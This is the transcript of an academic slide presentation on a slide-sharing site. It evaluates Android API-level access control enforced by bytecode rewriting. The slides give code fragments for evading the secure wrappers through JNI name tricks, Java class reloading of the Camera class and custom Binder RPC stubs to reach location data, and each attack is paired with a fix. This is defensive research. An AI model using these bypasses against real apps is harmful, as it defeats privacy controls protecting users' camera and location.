Presentation is loading. Please wait.

Presentation is loading. Please wait.

Wenliang Du Syracuse University Vicky Singh Syracuse University Hao Syracuse University.

Published byJudith Rhea Modified over 9 years ago

Similar presentations

Presentation on theme: "Wenliang Du Syracuse University Vicky Singh Syracuse University Hao Syracuse University."— Presentation transcript:

1 Wenliang Du Syracuse University Vicky Singh Syracuse University Hao Syracuse University

2 Agenda Introduction on API-level Access Control using Bytecode Rewriting Analysis on Existing Works Attacks Recommendations

3 Android Permission System Current Android install-time permission system Coarse-grained Permissions e.g., INTERNET permission Application Android API Privileged Resources Check Permissions

4 API-level Access Control Impose fine-grained access control Instrument applications Bytecode rewriting Native library rewriting Modify Android platform Flexibility Rich context information Easy deployment

5 Existing Works Bytecode rewriting Improving privacy on android smartphones through in-vivo bytecode instrumentation. A. Bartel, J. Klein, K. Allix, Y. Traon, and M. Monperrus. I-arm-droid: A rewriting framework for in-app reference monitors for android applications. B. Davis, B. Sanders, A. Khodaverdian, and H. Chen. Dr. android and Mr. hide: Fine-grained security policies on unmodified android. J. Jeon, K. K. Micinski, and J. A. Vaughan Application-centric security policies on unmodified android. N. Reddy, J. Jeon, J. Vaughan, T. Millstein, and J. Foster

6 Objective Systematic evaluation to assess the effectiveness of API-level access control using bytecode rewriting on Android platform

7 API-level Access Control Using Bytecode Rewriting Design Implementation ApplicationAndroid API Privileged Resources Secure Wrapper Secure App.apk Dalvik Bytecode Static Analysis Dalvik Bytecode Rewriting Repackage and Resigning OriginalApp.apk

8 Android API Architecture System Server Process Linux Kernel Application Android APIs System Services Secure Wrapper Native Shared Library Binder Java Native Interface Application Process Dalvik Virtual Machine Kernel Space Privileged Resources

9 Effectiveness of API-level Access Control System Server Process Linux Kernel Application Android APIs System Services Secure Wrapper Native Shared Library Binder Java Native Interface Application Process Dalvik Virtual Machine Kernel Space 2 2 1 1 3 3 4 4 Privileged Resources

10 Path 2: Invoke Native Libraries Directly Background: Java Native Interface Enable communications between Java code and native code. Usage package edu.com; public class MyClass { native public long myFunc(); static { System.loadLibrary("myLib"); } JNIEXPORT jlong Java_edu_com_MyClass_myFunc( JNIEnv* env, jobject thiz); myLib.so static JNINativeMethod method_table [] = {{ "myFunc", "(J)J", (void *) myFunc_Implementation }}; extern "C" jint JNI_OnLoad(JavaVM* vm,... ) { jclass c = env->FindClass("edu/com/MyClass"); env->RegisterNatives(c, method_table, 1); }

11 Path 2: Exploit JNI Naming Convention Objective Invoke a native library function without going through its corresponding Java API to evade the restriction enforced by the secure wrapper. Android APIs Secure Wrapper Shared Libraries Application Methods JNI

12 Path 2: Exploit JNI Naming Convention Attempts 1: (Fail) Attempts 2: (Success) package edu.com; public class MyClass { native public long my_Func(); } package edu.com.MyClass; public class my { native public long Func(); } package edu.com.MyClass; public class my { native long 1Func(); static { System.loadLibrary(’myLib’); } JNIEXPORT jlong Java_edu_com_MyClass_my_1Func( JNIEnv* env, jobject thiz); JNIEXPORT jlong Java_edu_com_MyClass_my_Func( JNIEnv* env, jobject thiz);

13 Path 2: Case Study In sqlite_jni library, we found functions with the "_1" pattern in the names. By invoking SQLite.Database.error.1string we successfully invoked Java_SQLite_Database_error_1string. package SQLite.Database; public class error { public static native String 1string(...); static{ System.loadLibrary(’sqlite_jni’); } } JNIEXPORT jstring JNICALL Java_SQLite_Database_error_1string(JNIEnv *env, …) { … } sqlite_jni.so

14 Path 2: Exploit Java Class Reloading Objective modify the implementation of the APIs that the wrapper is trying to protect. Application Customized Android APIs Secure Wrapper Shared Libraries Class Loader JNI

15 Path 2: Exploit Java Class Reloading Attempts 1: (Fail) use DexClassLoader to load redefined class package android.hardware; public class Camera{ final public void someFunc() { //Calling the privileged function privilegedFunc(); } native void privilegedFunc(); } DexClassLoader classLoader = new DexClassLoader ("Camera.apk",..., getClassLoader()); Class mClass = classLoader.loadClass("android.hardware.Camera"); android.hardware.Camera c = (android.hardware.Camera)mClass.newInstance(); //Access the privileged native code through someFunc() c.someFunc(); Class cannot be loaded again

16 Path 2: Exploit Java Class Reloading Attempts 2: (Success) Use user-define class loader package android.hardware; public class Camera{ final public void someFunc() { //Calling the privileged function privilegedFunc(); } native void privilegedFunc(); } public class MyDexLoader extends BaseDexClassLoader { // Constructor omitted @Override public Class loadClass(String s) { Class c; try { c = super.findClass(s); return c; } catch (ClassNotFoundException e) { // handling the exceptions } return null; } } Override loading policy

17 Path 2: Case Study Performed our attack on a camera application. Bytecode rewriter enforced finer-grained access control on method Camera.takePicture reload redefined android.hardware.Camera class into a new class loader. public class SecureCamera{ public static void takePicture(Camera camera,...){ Time now = new Time(); now.setToNow(); if(now.hour > 8 && now.hour < 18) { camera.takePicture(...); }}} package android.hardware; public class Camera { public void takeMyPicture(...) {...}} Take pictures between 8am to 6pm

18 Path 2: Case Study Associate native Java methods of Camera class with corresponding native library functions. Then attackers can use their customized class definition //Create a customized class loader MyDexLoader ld = new MyDexLoader(...); //Load redefined Camera class Class c = ld.loadClass("android.hardware.Camera"); Class util = ld.loadClass("com.android.internal.util.WithFramework"); Method m = util.getDeclaredMethod("registerNatives",...); m.invoke(...); //Invoke takeMyPicture method using reflection m = c.getDeclaredMethod("takeMyPicture",...); m.invoke(...);... } registers native functions with Camera Java class

19 Path 2: Recommendations Recommendations for Exploit JNI Naming Convention If any Java methods start with numbers, bytecode rewriter should remove the digit as it is illegal. Recommendations for Exploit Java Class Reloading One possible way is bytecode rewriter should restrict all the invocations of methods within the call chain from findClass in the class BaseDexClassLoader to loadClass in DexFile.

20 Path 3: Exploit Customized RPC Stubs Objective Applications code can directly communicate with the system services without going through APIs that invoke RPC stubs. Attack write attackers own RPC stub to communicate with System Service Secure Wrapper Native Shared Library Customized RPC Stubs Application Android APIs

21 Path 3: Case Study Evaluated on a geolocation application. Bytecode rewriter enforced fine access control policy on method getLastKnownLocation. class SecureLocationManager extends LocationManager{ public Location getLastKnownLocation(...) { Location loc = super.getLastKnownLocation(...); if(loc.getLatitude()>60&&loc.getLatitude()<70&& loc.getLongtitude()>140&&loc.getLongtitude() <160) { return loc; }} Retrieve location information when the location is within Alaska.

22 Path 3: Case Study Attackers can introduce customized RPC with different method signature. Use customized RPC with different method signature to bypass access control placed on getLastKnownLocation API. package my.location; /* User-defined RPC stub class */ public interface LocMgr extends android.os.IInterface { public static abstract class Stub extends android.os.Binder implements my.location.LocMgr {...}} import my.location.LocMgr; IBinder b=android.os.ServiceManager.getService(LOCATION_SERVICE); LocMgr sLocationManger = LocMgr.Stub.asInterface(b); Location loc = sLocationManger.getLastKnownLocation(...);

23 Path 3: Recommendation The fix is to apply the API-level access control on android.os.ServiceManager’s getService API, so application’s Java code cannot use this API to get system services.

24 Conclusion Our work manifests the need to address all the above attacks to fulfill an effective API-level access control using bytecode rewriting.

25 Questions?

Download ppt "Wenliang Du Syracuse University Vicky Singh Syracuse University Hao Syracuse University."

Similar presentations

Mobile Code Security Yurii Kuzmin. What is Mobile Code? Term used to describe general-purpose executables that run in remote locations. Web browsers come.

Mobile Code Security Yurii Kuzmin. What is Mobile Code? Term used to describe general-purpose executables that run in remote locations. Web browsers come.
What is RMI? Remote Method Invocation –A true distributed computing application interface for Java, written to provide easy access to objects existing.

What is RMI? Remote Method Invocation –A true distributed computing application interface for Java, written to provide easy access to objects existing.
Syracuse University, New York, USA

Syracuse University, New York, USA
DroidScope: Seamlessly Reconstructing the OS and Dalvik Semantic Views for Dynamic Android Malware Analysis Lok Kwong Yan, and Heng Yin Syracuse University.

DroidScope: Seamlessly Reconstructing the OS and Dalvik Semantic Views for Dynamic Android Malware Analysis Lok Kwong Yan, and Heng Yin Syracuse University.
Portability and Safety Mahdi Milani Fard Dec, 2006 Java.

Portability and Safety Mahdi Milani Fard Dec, 2006 Java.
Aurasium: Practical Policy Enforcement for Android Applications By Yaoqi USENIX Security Symposium 2012.

Aurasium: Practical Policy Enforcement for Android Applications By Yaoqi USENIX Security Symposium 2012.
On the Effectiveness of API-Level Access Control Using Bytecode Rewriting in Android Presenter: Lu Gong.

On the Effectiveness of API-Level Access Control Using Bytecode Rewriting in Android Presenter: Lu Gong.
1 InTroToJCL Introduction to Java Class Loaders. 2 class loader l ia an object responsible for loading classes. The class ClassLoader is an abstract class.

1 InTroToJCL Introduction to Java Class Loaders. 2 class loader l ia an object responsible for loading classes. The class ClassLoader is an abstract class.
Copyright © 2001 Qusay H. Mahmoud Case Study A Global Compute Engine Here we will discuss some implementation details: – Class Loaders – Compute Engine.

Copyright © 2001 Qusay H. Mahmoud Case Study A Global Compute Engine Here we will discuss some implementation details: – Class Loaders – Compute Engine.
Policy Weaving for Mobile Devices Drew Davidson. Smartphone security is critical – 1200 to 1400 US Army troops to be equipped with Android smartphones.

Policy Weaving for Mobile Devices Drew Davidson. Smartphone security is critical – 1200 to 1400 US Army troops to be equipped with Android smartphones.
Inlining Java Native Calls at Runtime (CASCON 2005 – 4 th Workshop on Compiler Driven Performance) Levon Stepanian, Angela Demke Brown Computer Systems.

Inlining Java Native Calls at Runtime (CASCON 2005 – 4 th Workshop on Compiler Driven Performance) Levon Stepanian, Angela Demke Brown Computer Systems.
Aurasium: Practical Policy Enforcement for Android Applications R. Xu, H. Saidi and R. Anderson Presented By: Rajat Khandelwal – 2009CS10209 Parikshit.

Aurasium: Practical Policy Enforcement for Android Applications R. Xu, H. Saidi and R. Anderson Presented By: Rajat Khandelwal – 2009CS10209 Parikshit.
The road to reliable, autonomous distributed systems

The road to reliable, autonomous distributed systems
Aurasium: Practical Policy Enforcement for Android Applications R. Xu, H. Saidi and R. Anderson.

Aurasium: Practical Policy Enforcement for Android Applications R. Xu, H. Saidi and R. Anderson.
1 Extensible Security Architectures for Java Authors: Dan S.Wallch, Dirk Balfanz Presented by Moonjoo Kim.

1 Extensible Security Architectures for Java Authors: Dan S.Wallch, Dirk Balfanz Presented by Moonjoo Kim.
Remote Method Invocation Chin-Chih Chang. Java Remote Object Invocation In Java, the object is serialized before being passed as a parameter to an RMI.

Remote Method Invocation Chin-Chih Chang. Java Remote Object Invocation In Java, the object is serialized before being passed as a parameter to an RMI.
Edward Tsai – CS 239 – Spring 2003 Strong Security for Active Networks CS 239 – Network Security Edward Tsai Tuesday, May 13, 2003.

Edward Tsai – CS 239 – Spring 2003 Strong Security for Active Networks CS 239 – Network Security Edward Tsai Tuesday, May 13, 2003.
Principles of Object-Oriented Software Development The language Java.

Principles of Object-Oriented Software Development The language Java.
Institute of Computing Jaca: a Reflective Fault Injection Tool based on Patterns Eliane Martins Cecilia Rubira Nelson Leme Institute of Computing State.

Institute of Computing Jaca: a Reflective Fault Injection Tool based on Patterns Eliane Martins Cecilia Rubira Nelson Leme Institute of Computing State.
Asst.Prof.Dr.Ahmet Ünveren 2014-2015 SPRING Computer Engineering Department Asst.Prof.Dr.Ahmet Ünveren 2014-2015 SPRING Computer Engineering Department.

Asst.Prof.Dr.Ahmet Ünveren SPRING Computer Engineering Department Asst.Prof.Dr.Ahmet Ünveren SPRING Computer Engineering Department.

Similar presentations

Ads by Google